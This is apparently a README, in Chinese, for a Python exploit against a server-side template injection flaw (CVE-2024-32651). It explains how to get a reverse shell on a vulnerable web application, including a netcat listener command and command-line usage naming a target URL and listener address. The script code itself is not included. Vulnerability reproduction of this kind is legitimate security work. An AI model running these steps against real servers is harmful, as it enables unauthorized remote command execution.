
服务端模板注入漏洞利用工具
服务端模板注入漏洞利用!!
通过服务端模板注入(SSTI)在易受攻击的Web应用中实现远程代码执行
此利用脚本针对易受服务端模板注入(SSTI)攻击的Web应用。攻击者可通过利用该漏洞在服务器上执行任意命令。所提供的Python脚本通过提交触发反向Shell的有效载荷来自动化利用过程。
要复现该漏洞,请针对易受攻击的Web应用执行提供的Python脚本。确保运行监听器(例如 nc -lvp 9999),以捕获反向Shell连接。
将脚本保存为文件 CVE-2024-32651.py。
安装所需的Python库(如果尚未安装):
pip install requests beautifulsoup4
要使用该脚本,请提供以下命令行参数:
--url: 易受攻击Web应用的基本URL(例如 http://10.10.10.10:5000)。--port: 监听器端口(例如 9999)。--ip: 监听器IP地址(例如 10.10.50.22)。--notification: (可选) 通知URL 如果你想使用特定的通知URL。python3 CVE-2024-32651.py --url http://<TARGET_URL> --port <LISTENER_PORT> --ip <LISTENER_IP> [--notification <NOTIFICATION_URL>]
此修复版本的利用脚本基于 Zach Crosman (zcrosman) 发布的原始利用脚本(EDB-ID: 52027)。 您可以在此处查看原始利用脚本。 我感谢 Zach Crosman 对安全社区的贡献。